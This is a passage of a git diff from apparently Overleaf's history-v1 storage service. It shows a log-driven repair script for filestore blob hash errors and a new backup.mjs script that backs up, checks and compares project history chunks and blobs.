`${BUFFER_DIR}/${projectId}_${fileId}` + try { + const blob = await bufferFilestoreFileToDisk(projectId, fileId, path) + return blob.getHash() + } finally { + await fs.promises.rm(path, { force: true }) + } +} + +/** + * @param {string} projectId + * @param {string} fileId + * @return {Promise<void>} + */ +async function uploadFilestoreFile(projectId, fileId) { + const path = `${BUFFER_DIR}/${projectId}_${fileId}` + try { + const blob = await bufferFilestoreFileToDisk(projectId, fileId, path) + const hash = blob.getHash() + try { + await ensureBlobExistsForFileAndUploadToAWS(projectId, fileId, hash) + } catch (err) { + if (!(err instanceof Blob.NotFoundError)) throw err + + const { 
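+ // makeBlobForFile (used via bufferFilestoreFileToDisk above) content-
+ // addresses the file; assuming history-v1's usual git-style SHA-1
+ // addressing, the 40-hex hash would be equivalent to this sketch:
+ //   Crypto.createHash('sha1')
+ //     .update(`blob ${byteLength}\u0000`)
+ //     .update(fileContents)
+ //     .digest('hex')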
project } = await getProject(projectId) + const historyId = project.overleaf.history.id.toString() + const blobStore = new BlobStore(historyId) + await blobStore.putBlob(path, blob) + await ensureBlobExistsForFileAndUploadToAWS(projectId, fileId, hash) + } + } finally { + await fs.promises.rm(path, { force: true }) + } +} + +/** + * @param {string} line + * @return {Promise<boolean>} + */ +async function fixHashMismatch(line) { + const { + projectId, + fileId, + hash: computedHash, + entry: { + hash: fileTreeHash, + ctx: { historyId }, + }, + } = JSON.parse(line) + const blobStore = new BlobStore(historyId) + if (await blobStore.getBlob(fileTreeHash)) { + throw new OError('found blob with computed filestore object hash') + } + if (!(await blobStore.getBlob(computedHash))) { + await importRestoredFilestoreFile(projectId, fileId, historyId) + return true + } + return await ensureBlobExistsForFileAndUploadToAWS( + projectId, + fileId, + computedHash + ) +} + +/** + * @param {string} projectId + * @param {string} fileId + * @param {string} hash + * @return {Promise<boolean>} + */ +async function hashAlreadyUpdatedInFileTree(projectId, fileId, hash) { + const { fileRef } = await findFile(projectId, fileId) + return fileRef.hash === hash +} + +/** + * @param {string} projectId + * @param {string} hash + * @return {Promise<boolean>} + */ +async function needsBackingUpToAWS(projectId, hash) { + if (GLOBAL_BLOBS.has(hash)) return false + return !(await _blobIsBackedUp(projectId, hash)) +} + +/** + * @param {string} projectId + * @param {string} fileId + * @param {string} hash + * @return {Promise<boolean>} + */ +async function ensureBlobExistsForFileAndUploadToAWS(projectId, fileId, hash) { + const { project } = await getProject(projectId) + const historyId = project.overleaf.history.id.toString() + const blobStore = new BlobStore(historyId) + if ( + (await hashAlreadyUpdatedInFileTree(projectId, fileId, hash)) && + (await blobStore.getBlob(hash)) && + !(await needsBackingUpToAWS(projectId, hash)) + ) { + return false // already processed + } + + const stream = await blobStore.getStream(hash) + const path = `${BUFFER_DIR}/${historyId}_${hash}` + try { + await Stream.promises.pipeline( + stream, + fs.createWriteStream(path, { + highWaterMark: STREAM_HIGH_WATER_MARK, + }) + ) + + const writtenBlob = await makeBlobForFile(path) + writtenBlob.setStringLength( + await getStringLengthOfFile(writtenBlob.getByteLength(), path) + ) + if (writtenBlob.getHash() !== hash) { + // Double check download, better safe than sorry. + throw new OError('blob corrupted', { writtenBlob }) + } + + let blob = await blobStore.getBlob(hash) + if (!blob) { + // Calling blobStore.putBlob would result in the same error again. + // HACK: Skip upload to GCS and finalize putBlob operation directly. 
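+ // Rationale: the object bytes are already in the history bucket (the
+ // getStream call above succeeded) and were re-hashed locally to prove
+ // integrity; only the metadata row is missing, so insert that directly
+ // instead of repeating the putBlob call that fails.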
+ await blobStore.backend.insertBlob(historyId, writtenBlob) + } + await backupBlob(historyId, writtenBlob, path) + } finally { + await fs.promises.rm(path, { force: true }) + } + await setHashInMongo(projectId, fileId, hash) + return true +} + +/** + * @param {string} line + * @return {Promise<boolean>} + */ +async function fixDeletePermission(line) { + let { projectId, fileId, hash } = JSON.parse(line) + if (!hash) hash = await computeFilestoreFileHash(projectId, fileId) + return await ensureBlobExistsForFileAndUploadToAWS(projectId, fileId, hash) +} + +/** + * @param {string} line + * @return {Promise<boolean>} + */ +async function fixMissingHash(line) { + let { projectId, _id: fileId } = JSON.parse(line) + const { + fileRef: { hash }, + } = await findFile(projectId, fileId) + if (hash) { + // processed, double check + return await ensureBlobExistsForFileAndUploadToAWS(projectId, fileId, hash) + } + await uploadFilestoreFile(projectId, fileId) + return true +} + +const CASES = { + 'not found': { + match: 'NotFoundError', + flag: FIX_NOT_FOUND, + action: fixNotFound, + }, + 'hash mismatch': { + match: 'OError: hash mismatch', + flag: FIX_HASH_MISMATCH, + action: fixHashMismatch, + }, + 'delete permission': { + match: 'storage.objects.delete', + flag: FIX_DELETE_PERMISSION, + action: fixDeletePermission, + }, + 'missing file hash': { + match: '"bad file hash"', + flag: FIX_MISSING_HASH, + action: fixMissingHash, + }, +} + +const STATS = { + processedLines: 0, + success: 0, + alreadyProcessed: 0, + fileDeleted: 0, + skipped: 0, + failed: 0, + unmatched: 0, +} +function logStats() { + console.log( + JSON.stringify({ + time: new Date(), + gracefulShutdownInitiated, + ...STATS, + }) + ) +} +setInterval(logStats, 10_000) + +async function processLog() { + const rl = readline.createInterface({ + input: fs.createReadStream(LOGS), + }) + nextLine: for await (const line of rl) { + if (gracefulShutdownInitiated) break + STATS.processedLines++ + if ( + !( + line.includes('"failed to process file"') || + // Process missing hashes as flagged by find_malformed_filetrees.mjs + line.includes('"bad file-tree path"') + ) + ) { + continue + } + + for (const [name, { match, flag, action }] of Object.entries(CASES)) { + if (!line.includes(match)) continue + if (flag) { + try { + if (await action(line)) { + STATS.success++ + } else { + STATS.alreadyProcessed++ + } + } catch (err) { + if (err instanceof FileDeletedError) { + STATS.fileDeleted++ + logger.info({ err, line }, 'file deleted, skipping') + } else { + STATS.failed++ + logger.error({ err, line }, `failed to fix ${name}`) + } + } + } else { + STATS.skipped++ + } + continue nextLine + } + STATS.unmatched++ + logger.warn({ line }, 'unknown fatal error') + } +} + +async function main() { + try { + await processLog() + } finally { + logStats() + try { + await fs.promises.rm(BUFFER_DIR, { recursive: true, force: true }) + } catch (err) { + console.error(`Cleanup of BUFFER_DIR=${BUFFER_DIR} failed`, err) + } + } + const { skipped, failed, unmatched } = STATS + await setTimeout(SLEEP_BEFORE_EXIT) + if (failed > 0) { + process.exit(Math.min(failed, 99)) + } else if (unmatched > 0) { + process.exit(100) + } else if (skipped > 0) { + process.exit(101) + } else { + process.exit(0) + } +} + +await main() diff --git a/services/history-v1/storage/scripts/backup.mjs b/services/history-v1/storage/scripts/backup.mjs new file mode 100644 index 0000000..9ae6101 --- /dev/null +++ b/services/history-v1/storage/scripts/backup.mjs @@ -0,0 +1,1104 @@ +// @ts-check + +import 
logger from '@overleaf/logger' +import commandLineArgs from 'command-line-args' +import { Chunk, History, Snapshot } from 'overleaf-editor-core' +import { + getProjectChunks, + loadLatestRaw, + create, +} from '../lib/chunk_store/index.js' +import { client } from '../lib/mongodb.js' +import redis from '../lib/redis.js' +import knex from '../lib/knex.js' +import { historyStore } from '../lib/history_store.js' +import pLimit from 'p-limit' +import { + GLOBAL_BLOBS, + loadGlobalBlobs, + makeProjectKey, + BlobStore, +} from '../lib/blob_store/index.js' +import { + listPendingBackups, + getBackupStatus, + setBackupVersion, + updateCurrentMetadataIfNotSet, + updatePendingChangeTimestamp, + getBackedUpBlobHashes, + unsetBackedUpBlobHashes, +} from '../lib/backup_store/index.js' +import { backupBlob, downloadBlobToDir } from '../lib/backupBlob.mjs' +import { + backupPersistor, + chunksBucket, + projectBlobsBucket, +} from '../lib/backupPersistor.mjs' +import { backupGenerator } from '../lib/backupGenerator.mjs' +import { promises as fs, createWriteStream } from 'node:fs' +import os from 'node:os' +import path from 'node:path' +import projectKey from '../lib/project_key.js' +import Crypto from 'node:crypto' +import Stream from 'node:stream' +import { EventEmitter } from 'node:events' +import { + objectIdFromInput, + batchedUpdate, + READ_PREFERENCE_SECONDARY, +} from '@overleaf/mongo-utils/batchedUpdate.js' +import { createGunzip } from 'node:zlib' +import { text } from 'node:stream/consumers' +import { fromStream as blobHashFromStream } from '../lib/blob_hash.js' +import { NotFoundError } from '@overleaf/object-persistor/src/Errors.js' + +// Create a singleton promise that loads global blobs once +let globalBlobsPromise = null +function ensureGlobalBlobsLoaded() { + if (!globalBlobsPromise) { + globalBlobsPromise = loadGlobalBlobs() + } + return globalBlobsPromise +} + +EventEmitter.defaultMaxListeners = 20 + +logger.initialize('history-v1-backup') + +// Settings shared between command-line and module usage +let DRY_RUN = false +let RETRY_LIMIT = 3 +const RETRY_DELAY = 1000 +let CONCURRENCY = 4 +let BATCH_CONCURRENCY = 1 +let BLOB_LIMITER = pLimit(CONCURRENCY) +let USE_SECONDARY = false + +/** + * Configure backup settings + * @param {Object} options Backup configuration options + */ +export function configureBackup(options = {}) { + DRY_RUN = options.dryRun || false + RETRY_LIMIT = options.retries || 3 + CONCURRENCY = options.concurrency || 1 + BATCH_CONCURRENCY = options.batchConcurrency || 1 + BLOB_LIMITER = pLimit(CONCURRENCY) + USE_SECONDARY = options.useSecondary || false +} + +let gracefulShutdownInitiated = false + +process.on('SIGINT', handleSignal) +process.on('SIGTERM', handleSignal) + +function handleSignal() { + gracefulShutdownInitiated = true + logger.info({}, 'graceful shutdown initiated, draining queue') +} + +async function retry(fn, times, delayMs) { + let attempts = times + while (attempts > 0) { + try { + const result = await fn() + return result + } catch (err) { + attempts-- + if (attempts === 0) throw err + await new Promise(resolve => setTimeout(resolve, delayMs)) + } + } +} + +function wrapWithRetry(fn, retries, delayMs) { + return async (...args) => { + const result = await retry(() => fn(...args), retries, delayMs) + return result + } +} + +const downloadWithRetry = wrapWithRetry( + downloadBlobToDir, + RETRY_LIMIT, + RETRY_DELAY +) +// FIXME: this creates a new backupPersistor for each blob +// so there is no caching of the DEK +const backupWithRetry = 
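+// wrapWithRetry keeps the wrapped function's signature and retries on
+// rejection with a fixed delay. Note RETRY_LIMIT is read once, here at module
+// load, so configureBackup's `retries` option does not affect these two
+// pre-built wrappers. Usage sketch (hypothetical flaky function):
+//   const flaky = async () => { if (Math.random() < 0.5) throw new Error('x') }
+//   const stable = wrapWithRetry(flaky, 3, 1000) // up to 3 attempts, 1s apart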
wrapWithRetry(backupBlob, RETRY_LIMIT, RETRY_DELAY) + +async function findNewBlobs(projectId, blobs) { + const newBlobs = [] + const existingBackedUpBlobHashes = await getBackedUpBlobHashes(projectId) + for (const blob of blobs) { + const hash = blob.getHash() + if (existingBackedUpBlobHashes.has(blob.getHash())) { + logger.debug({ projectId, hash }, 'Blob is already backed up, skipping') + continue + } + const globalBlob = GLOBAL_BLOBS.get(hash) + if (globalBlob && !globalBlob.demoted) { + logger.debug( + { projectId, hash }, + 'Blob is a global blob and not demoted, skipping' + ) + continue + } + newBlobs.push(blob) + } + return newBlobs +} + +async function cleanBackedUpBlobs(projectId, blobs) { + const hashes = blobs.map(blob => blob.getHash()) + if (DRY_RUN) { + console.log( + 'Would remove blobs', + hashes.join(' '), + 'from project', + projectId + ) + return + } + await unsetBackedUpBlobHashes(projectId, hashes) +} + +async function backupSingleBlob(projectId, historyId, blob, tmpDir, persistor) { + if (DRY_RUN) { + console.log( + 'Would back up blob', + JSON.stringify(blob), + 'in history', + historyId, + 'for project', + projectId + ) + return + } + logger.debug({ blob, historyId }, 'backing up blob') + const blobPath = await downloadWithRetry(historyId, blob, tmpDir) + await backupWithRetry(historyId, blob, blobPath, persistor) +} + +async function backupBlobs(projectId, historyId, blobs, limiter, persistor) { + let tmpDir + try { + tmpDir = await fs.mkdtemp(path.join(os.tmpdir(), 'blob-backup-')) + + const blobBackupOperations = blobs.map(blob => + limiter(backupSingleBlob, projectId, historyId, blob, tmpDir, persistor) + ) + + // Reject if any blob backup fails + await Promise.all(blobBackupOperations) + } finally { + if (tmpDir) { + await fs.rm(tmpDir, { recursive: true, force: true }) + } + } +} + +async function backupChunk( + projectId, + historyId, + chunkBackupPersistorForProject, + chunkToBackup, + chunkRecord, + chunkBuffer +) { + if (DRY_RUN) { + console.log( + 'Would back up chunk', + JSON.stringify(chunkRecord), + 'in history', + historyId, + 'for project', + projectId, + 'key', + makeChunkKey(historyId, chunkToBackup.startVersion) + ) + return + } + const key = makeChunkKey(historyId, chunkToBackup.startVersion) + logger.debug({ chunkRecord, historyId, projectId, key }, 'backing up chunk') + const md5 = Crypto.createHash('md5').update(chunkBuffer) + await chunkBackupPersistorForProject.sendStream( + chunksBucket, + makeChunkKey(historyId, chunkToBackup.startVersion), + Stream.Readable.from([chunkBuffer]), + { + contentType: 'application/json', + contentEncoding: 'gzip', + contentLength: chunkBuffer.byteLength, + sourceMd5: md5.digest('hex'), + } + ) +} + +async function updateBackupStatus( + projectId, + lastBackedUpVersion, + chunkRecord, + startOfBackupTime +) { + if (DRY_RUN) { + console.log( + 'Would set backup version to', + chunkRecord.endVersion, + 'with lastBackedUpTimestamp', + startOfBackupTime + ) + return + } + logger.debug( + { projectId, chunkRecord, startOfBackupTime }, + 'setting backupVersion and lastBackedUpTimestamp' + ) + await setBackupVersion( + projectId, + lastBackedUpVersion, + chunkRecord.endVersion, + startOfBackupTime + ) +} + +// Define command-line options +const optionDefinitions = [ + { + name: 'projectId', + alias: 'p', + type: String, + description: 'The ID of the project to backup', + defaultOption: true, + }, + { + name: 'help', + alias: 'h', + type: Boolean, + description: 'Display this usage guide.', + }, + { + name: 'status', + 
alias: 's', + type: Boolean, + description: 'Display project status.', + }, + { + name: 'list', + alias: 'l', + type: Boolean, + description: 'List projects that need to be backed up', + }, + { + name: 'dry-run', + alias: 'n', + type: Boolean, + description: 'Perform a dry run without making any changes.', + }, + { + name: 'retries', + alias: 'r', + type: Number, + description: 'Number of retries, default is 3.', + }, + { + name: 'concurrency', + alias: 'c', + type: Number, + description: 'Number of concurrent blob downloads (default: 1)', + }, + { + name: 'batch-concurrency', + alias: 'b', + type: Number, + description: 'Number of concurrent project operations (default: 1)', + }, + { + name: 'pending', + alias: 'P', + type: Boolean, + description: 'Backup all pending projects.', + }, + { + name: 'interval', + alias: 'i', + type: Number, + description: 'Time interval in seconds for pending backups (default: 3600)', + defaultValue: 3600, + }, + { + name: 'fix', + type: Number, + description: 'Fix projects without chunks', + }, + { + name: 'init', + alias: 'I', + type: Boolean, + description: 'Initialize backups for all projects.', + }, + { name: 'output', alias: 'o', type: String, description: 'Output file' }, + { + name: 'start-date', + type: String, + description: 'Start date for initialization (ISO format)', + }, + { + name: 'end-date', + type: String, + description: 'End date for initialization (ISO format)', + }, + { + name: 'use-secondary', + type: Boolean, + description: 'Use secondary read preference for backup status', + }, + { + name: 'compare', + alias: 'C', + type: Boolean, + description: + 'Compare backup with original chunks. With --start-date and --end-date compares all projects in range.', + }, +] + +function handleOptions() { + const options = commandLineArgs(optionDefinitions) + + if (options.help) { + console.log('Usage:') + optionDefinitions.forEach(option => { + console.log(` --${option.name}, -${option.alias}: ${option.description}`) + }) + process.exit(0) + } + + const projectIdRequired = + !options.list && + !options.pending && + !options.init && + !(options.fix >= 0) && + !(options.compare && options['start-date'] && options['end-date']) + + if (projectIdRequired && !options.projectId) { + console.error('Error: projectId is required') + process.exit(1) + } + + if (options.pending && options.projectId) { + console.error('Error: --pending cannot be specified with projectId') + process.exit(1) + } + + if (options.pending && (options.list || options.status)) { + console.error('Error: --pending is exclusive with --list and --status') + process.exit(1) + } + + if (options.init && options.pending) { + console.error('Error: --init cannot be specified with --pending') + process.exit(1) + } + + if ( + (options['start-date'] || options['end-date']) && + !options.init && + !options.compare + ) { + console.error( + 'Error: date options can only be used with --init or --compare' + ) + process.exit(1) + } + + if (options['use-secondary']) { + USE_SECONDARY = true + } + + if ( + options.compare && + !options.projectId && + !(options['start-date'] && options['end-date']) + ) { + console.error( + 'Error: --compare requires either projectId or both --start-date and --end-date' + ) + process.exit(1) + } + + DRY_RUN = options['dry-run'] || false + RETRY_LIMIT = options.retries || 3 + CONCURRENCY = options.concurrency || 1 + BATCH_CONCURRENCY = options['batch-concurrency'] || 1 + BLOB_LIMITER = pLimit(CONCURRENCY) + return options +} + +async function displayBackupStatus(projectId) { + 
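+ // handleOptions above admits several mutually exclusive modes; typical
+ // invocations look like (illustrative):
+ //   node backup.mjs <projectId>            back up one project
+ //   node backup.mjs --pending              drain all pending backups
+ //   node backup.mjs --compare <projectId>  verify an existing backup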
const result = await analyseBackupStatus(projectId) + console.log('Backup status:', JSON.stringify(result)) +} + +async function analyseBackupStatus(projectId) { + const { backupStatus, historyId, currentEndVersion, currentEndTimestamp } = + await getBackupStatus(projectId) + // TODO: when we have confidence that the latestChunkMetadata always matches + // the values from the backupStatus we can skip loading it here + const latestChunkMetadata = await loadLatestRaw(historyId, { + readOnly: Boolean(USE_SECONDARY), + }) + if ( + currentEndVersion && + currentEndVersion !== latestChunkMetadata.endVersion + ) { + // compare the current end version with the latest chunk metadata to check that + // the updates to the project collection are reliable + // expect some failures due to the time window between getBackupStatus and + // loadLatestRaw where the project is being actively edited. + logger.warn( + { + projectId, + historyId, + currentEndVersion, + currentEndTimestamp, + latestChunkMetadata, + }, + 'currentEndVersion does not match latest chunk metadata' + ) + } + + if (DRY_RUN) { + console.log('Project:', projectId) + console.log('History ID:', historyId) + console.log('Latest Chunk Metadata:', JSON.stringify(latestChunkMetadata)) + console.log('Current end version:', currentEndVersion) + console.log('Current end timestamp:', currentEndTimestamp) + console.log('Backup status:', backupStatus ?? 'none') + } + if (!backupStatus) { + if (DRY_RUN) { + console.log('No backup status found - doing full backup') + } + } + const lastBackedUpVersion = backupStatus?.lastBackedUpVersion + const endVersion = latestChunkMetadata.endVersion + if (endVersion >= 0 && endVersion === lastBackedUpVersion) { + if (DRY_RUN) { + console.log( + 'Project is up to date, last backed up at version', + lastBackedUpVersion + ) + } + } else if (endVersion < lastBackedUpVersion) { + throw new Error('backup is ahead of project') + } else { + if (DRY_RUN) { + console.log( + 'Project needs to be backed up from', + lastBackedUpVersion, + 'to', + endVersion + ) + } + } + + return { + historyId, + lastBackedUpVersion, + currentVersion: latestChunkMetadata.endVersion || 0, + upToDate: endVersion >= 0 && lastBackedUpVersion === endVersion, + pendingChangeAt: backupStatus?.pendingChangeAt, + currentEndVersion, + currentEndTimestamp, + latestChunkMetadata, + } +} + +async function displayPendingBackups(options) { + const intervalMs = options.interval * 1000 + for await (const project of listPendingBackups(intervalMs)) { + console.log( + 'Project:', + project._id.toHexString(), + 'backup status:', + JSON.stringify(project.overleaf.backup), + 'history status:', + JSON.stringify(project.overleaf.history, [ + 'currentEndVersion', + 'currentEndTimestamp', + ]) + ) + } +} + +function makeChunkKey(projectId, startVersion) { + return path.join(projectKey.format(projectId), projectKey.pad(startVersion)) +} + +export async function backupProject(projectId, options) { + if (gracefulShutdownInitiated) { + return + } + await ensureGlobalBlobsLoaded() + // FIXME: flush the project first! 
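+ // Any changes not yet flushed into the chunk store are invisible to
+ // analyseBackupStatus, so a backup taken here is only as fresh as the
+ // last flush.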
+ // Let's assume the flush happens externally and triggers this backup
+ const backupStartTime = new Date()
+ // find the last backed up version
+ const {
+ historyId,
+ lastBackedUpVersion,
+ currentVersion,
+ upToDate,
+ pendingChangeAt,
+ currentEndVersion,
+ latestChunkMetadata,
+ } = await analyseBackupStatus(projectId)
+
+ if (upToDate) {
+ logger.debug(
+ {
+ projectId,
+ historyId,
+ lastBackedUpVersion,
+ currentVersion,
+ pendingChangeAt,
+ },
+ 'backup is up to date'
+ )
+
+ if (
+ currentEndVersion === undefined &&
+ latestChunkMetadata.endVersion >= 0
+ ) {
+ if (DRY_RUN) {
+ console.log('Would update current metadata to', latestChunkMetadata)
+ } else {
+ await updateCurrentMetadataIfNotSet(projectId, latestChunkMetadata)
+ }
+ }
+
+ // clear the pending changes timestamp if the backup is complete
+ if (pendingChangeAt) {
+ if (DRY_RUN) {
+ console.log(
+ 'Would update or clear pending changes timestamp',
+ backupStartTime
+ )
+ } else {
+ await updatePendingChangeTimestamp(projectId, backupStartTime)
+ }
+ }
+ return
+ }
+
+ logger.debug(
+ {
+ projectId,
+ historyId,
+ lastBackedUpVersion,
+ currentVersion,
+ pendingChangeAt,
+ },
+ 'backing up project'
+ )
+
+ // this persistor works for both the chunks and blobs buckets,
+ // because they use the same DEK
+ const backupPersistorForProject = await backupPersistor.forProject(
+ chunksBucket,
+ makeProjectKey(historyId, '')
+ )
+
+ let previousBackedUpVersion = lastBackedUpVersion
+ const backupVersions = [previousBackedUpVersion]
+
+ for await (const {
+ blobsToBackup,
+ chunkToBackup,
+ chunkRecord,
+ chunkBuffer,
+ } of backupGenerator(historyId, lastBackedUpVersion)) {
+ // backup the blobs first
+ // this can be done in parallel but must fail if any blob cannot be backed up
+ // if the blob already exists in the backup then that is allowed
+ const newBlobs = await findNewBlobs(projectId, blobsToBackup)
+
+ await backupBlobs(
+ projectId,
+ historyId,
+ newBlobs,
+ BLOB_LIMITER,
+ backupPersistorForProject
+ )
+
+ // then backup the original compressed chunk using the startVersion as the key
+ await backupChunk(
+ projectId,
+ historyId,
+ backupPersistorForProject,
+ chunkToBackup,
+ chunkRecord,
+ chunkBuffer
+ )
+
+ // persist the backup status in mongo for the current chunk
+ try {
+ await updateBackupStatus(
+ projectId,
+ previousBackedUpVersion,
+ chunkRecord,
+ backupStartTime
+ )
+ } catch (err) {
+ logger.error(
+ { projectId, chunkRecord, err, backupVersions },
+ 'error updating backup status'
+ )
+ throw err
+ }
+
+ previousBackedUpVersion = chunkRecord.endVersion
+ backupVersions.push(previousBackedUpVersion)
+
+ await cleanBackedUpBlobs(projectId, blobsToBackup)
+ }
+
+ // update the current end version and timestamp if they are not set
+ if (currentEndVersion === undefined && latestChunkMetadata.endVersion >= 0) {
+ if (DRY_RUN) {
+ console.log('Would update current metadata to', latestChunkMetadata)
+ } else {
+ await updateCurrentMetadataIfNotSet(projectId, latestChunkMetadata)
+ }
+ }
+
+ // clear the pending changes timestamp if the backup is complete, otherwise set it to the time
+ // when the backup started (to pick up the new changes on the next backup)
+ if (DRY_RUN) {
+ console.log(
+ 'Would update or clear pending changes timestamp',
+ backupStartTime
+ )
+ } else {
+ await updatePendingChangeTimestamp(projectId, backupStartTime)
+ }
+}
+
+function convertToISODate(dateStr) {
+ // Expecting YYYY-MM-DD format
+ if (!/^\d{4}-\d{2}-\d{2}$/.test(dateStr)) {
+ throw new Error('Date must be in
YYYY-MM-DD format') + } + return new Date(dateStr + 'T00:00:00.000Z').toISOString() +} + +export async function fixProjectsWithoutChunks(options) { + const limit = options.fix || 1 + const query = { + 'overleaf.history.id': { $exists: true }, + 'overleaf.backup.lastBackedUpVersion': { $in: [null] }, + } + const cursor = client + .db() + .collection('projects') + .find(query, { + projection: { _id: 1, 'overleaf.history.id': 1 }, + readPreference: READ_PREFERENCE_SECONDARY, + }) + .limit(limit) + for await (const project of cursor) { + const historyId = project.overleaf.history.id.toString() + const chunks = await getProjectChunks(historyId) + if (chunks.length > 0) { + continue + } + if (DRY_RUN) { + console.log( + 'Would create new chunk for Project ID:', + project._id.toHexString(), + 'History ID:', + historyId, + 'Chunks:', + chunks + ) + } else { + console.log( + 'Creating new chunk for Project ID:', + project._id.toHexString(), + 'History ID:', + historyId, + 'Chunks:', + chunks + ) + const snapshot = new Snapshot() + const history = new History(snapshot, []) + const chunk = new Chunk(history, 0) + await create(historyId, chunk) + const newChunks = await getProjectChunks(historyId) + console.log('New chunk:', newChunks) + } + } +} + +export async function initializeProjects(options) { + await ensureGlobalBlobsLoaded() + let totalErrors = 0 + let totalProjects = 0 + + const query = { + 'overleaf.backup.lastBackedUpVersion': { $in: [null] }, + } + + if (options['start-date'] && options['end-date']) { + query._id = { + $gte: objectIdFromInput(convertToISODate(options['start-date'])), + $lt: objectIdFromInput(convertToISODate(options['end-date'])), + } + } + + const cursor = client + .db() + .collection('projects') + .find(query, { + projection: { _id: 1 }, + readPreference: READ_PREFERENCE_SECONDARY, + }) + + if (options.output) { + console.log("Writing project IDs to file: '" + options.output + "'") + const output = createWriteStream(options.output) + for await (const project of cursor) { + output.write(project._id.toHexString() + '\n') + totalProjects++ + } + output.end() + console.log('Wrote ' + totalProjects + ' project IDs to file') + return + } + + for await (const project of cursor) { + if (gracefulShutdownInitiated) { + console.warn('graceful shutdown: stopping project initialization') + break + } + totalProjects++ + const projectId = project._id.toHexString() + try { + await backupProject(projectId, options) + } catch (err) { + totalErrors++ + logger.error({ projectId, err }, 'error backing up project') + } + } + + return { errors: totalErrors, projects: totalProjects } +} + +async function backupPendingProjects(options) { + const intervalMs = options.interval * 1000 + for await (const project of listPendingBackups(intervalMs)) { + if (gracefulShutdownInitiated) { + console.warn('graceful shutdown: stopping pending project backups') + break + } + const projectId = project._id.toHexString() + console.log(`Backing up pending project with ID: ${projectId}`) + await backupProject(projectId, options) + } +} + +class BlobComparator { + constructor(backupPersistorForProject) { + this.cache = new Map() + this.backupPersistorForProject = backupPersistorForProject + } + + async compareBlob(historyId, blob) { + let computedHash = this.cache.get(blob.hash) + const fromCache = !!computedHash + + if (!computedHash) { + const blobKey = makeProjectKey(historyId, blob.hash) + const backupBlobStream = + await this.backupPersistorForProject.getObjectStream( + projectBlobsBucket, + blobKey, + { 
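+ // Backed-up blobs may be stored gzip-compressed; autoGunzip asks the
+ // persistor to decompress transparently so blobHashFromStream can
+ // recompute the content hash over the original bytes.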
autoGunzip: true } + ) + computedHash = await blobHashFromStream(blob.byteLength, backupBlobStream) + this.cache.set(blob.hash, computedHash) + } + + const matches = computedHash === blob.hash + return { + matches, + computedHash, + fromCache, + } + } +} + +async function compareBackups(projectId, options) { + console.log(`Comparing backups for project ${projectId}`) + const { historyId } = await getBackupStatus(projectId) + const chunks = await getProjectChunks(historyId) + const blobStore = new BlobStore(historyId) + const backupPersistorForProject = await backupPersistor.forProject( + chunksBucket, + makeProjectKey(historyId, '') + ) + + let totalChunkMatches = 0 + let totalChunkMismatches = 0 + let totalChunksNotFound = 0 + let totalBlobMatches = 0 + let totalBlobMismatches = 0 + let totalBlobsNotFound = 0 + const errors = [] + const blobComparator = new BlobComparator(backupPersistorForProject) + + for (const chunk of chunks) { + try { + // Compare chunk content + const originalChunk = await historyStore.loadRaw(historyId, chunk.id) + const key = makeChunkKey(historyId, chunk.startVersion) + try { + const backupChunkStream = + await backupPersistorForProject.getObjectStream(chunksBucket, key) + const backupStr = await text(backupChunkStream.pipe(createGunzip())) + const originalStr = JSON.stringify(originalChunk) + const backupChunk = JSON.parse(backupStr) + const backupStartVersion = chunk.startVersion + const backupEndVersion = chunk.startVersion + backupChunk.changes.length + + if (originalStr === backupStr) { + console.log( + `✓ Chunk ${chunk.id} (v${chunk.startVersion}-v${chunk.endVersion}) matches` + ) + totalChunkMatches++ + } else if (originalStr === JSON.stringify(JSON.parse(backupStr))) { + console.log( + `✓ Chunk ${chunk.id} (v${chunk.startVersion}-v${chunk.endVersion}) matches (after normalisation)` + ) + totalChunkMatches++ + } else if (backupEndVersion < chunk.endVersion) { + console.log( + `✗ Chunk ${chunk.id} is ahead of backup (v${chunk.startVersion}-v${chunk.endVersion} vs v${backupStartVersion}-v${backupEndVersion})` + ) + totalChunkMismatches++ + errors.push({ chunkId: chunk.id, error: 'Chunk ahead of backup' }) + } else { + console.log( + `✗ Chunk ${chunk.id} (v${chunk.startVersion}-v${chunk.endVersion}) MISMATCH` + ) + totalChunkMismatches++ + errors.push({ chunkId: chunk.id, error: 'Chunk mismatch' }) + } + } catch (err) { + if (err instanceof NotFoundError) { + console.log(`✗ Chunk ${chunk.id} not found in backup`, err.cause) + totalChunksNotFound++ + errors.push({ chunkId: chunk.id, error: `Chunk not found` }) + } else { + throw err + } + } + + const history = History.fromRaw(originalChunk) + + // Compare blobs in chunk + const blobHashes = new Set() + history.findBlobHashes(blobHashes) + const blobs = await blobStore.getBlobs(Array.from(blobHashes)) + for (const blob of blobs) { + if (GLOBAL_BLOBS.has(blob.hash)) { + const globalBlob = GLOBAL_BLOBS.get(blob.hash) + console.log( + ` ✓ Blob ${blob.hash} is a global blob`, + globalBlob.demoted ? '(demoted)' : '' + ) + continue + } + try { + const { matches, computedHash, fromCache } = + await blobComparator.compareBlob(historyId, blob) + + if (matches) { + console.log( + ` ✓ Blob ${blob.hash} hash matches (${blob.byteLength} bytes)` + + (fromCache ? ' (from cache)' : '') + ) + totalBlobMatches++ + } else { + console.log( + ` ✗ Blob ${blob.hash} hash mismatch (original: ${blob.hash}, backup: ${computedHash}) (${blob.byteLength} bytes, ${blob.stringLength} string length)` + + (fromCache ? 
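+ // compareBlob memoises verdicts by blob hash (BlobComparator.cache), so a
+ // blob referenced from many chunks is downloaded and hashed only once;
+ // fromCache marks the reused results in this output.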
' (from cache)' : '') + ) + totalBlobMismatches++ + errors.push({ + chunkId: chunk.id, + error: `Blob ${blob.hash} hash mismatch`, + }) + } + } catch (err) { + if (err instanceof NotFoundError) { + console.log(` ✗ Blob ${blob.hash} not found in backup`, err.cause) + totalBlobsNotFound++ + errors.push({ + chunkId: chunk.id, + error: `Blob ${blob.hash} not found`, + }) + } else { + throw err + } + } + } + } catch (err) { + console.error(`Error comparing chunk ${chunk.id}:`, err) + errors.push({ chunkId: chunk.id, error: err }) + } + } + + // Print summary + console.log('\nComparison Summary:') + console.log('==================') + console.log(`Total chunks: ${chunks.length}`) + console.log(`Chunk matches: ${totalChunkMatches}`) + console.log(`Chunk mismatches: ${totalChunkMismatches}`) + console.log(`Chunk not found: ${totalChunksNotFound}`) + console.log(`Blob matches: ${totalBlobMatches}`) + console.log(`Blob mismatches: ${totalBlobMismatches}`) + console.log(`Blob not found: ${totalBlobsNotFound}`) + console.log(`Errors: ${errors.length}`) + + if (errors.length > 0) { + console.log('\nErrors:') + errors.forEach(({ chunkId, error }) => { + console.log(` Chunk ${chunkId}: ${error}`) + }) + throw new Error('Backup comparison FAILED') + } else { + 